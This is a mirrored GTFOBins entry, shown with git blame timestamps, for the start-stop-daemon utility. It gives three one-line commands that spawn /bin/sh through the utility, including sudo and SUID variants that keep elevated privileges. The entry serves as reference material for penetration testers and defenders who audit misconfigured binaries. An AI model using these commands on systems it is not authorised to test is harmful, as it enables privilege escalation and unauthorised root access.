1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-02-22 18:23:29 +01:00
GTFOBins.github.io/_gtfobins/start-stop-daemon.md

10 lines
222 B
Markdown
Raw Normal View History

2018-11-05 16:34:57 +01:00
---
functions:
shell:
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
suid:
2018-11-05 16:41:04 +01:00
- code: ./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
2018-11-05 16:34:57 +01:00
sudo:
2018-11-05 16:41:04 +01:00
- code: sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
2018-11-05 16:34:57 +01:00
---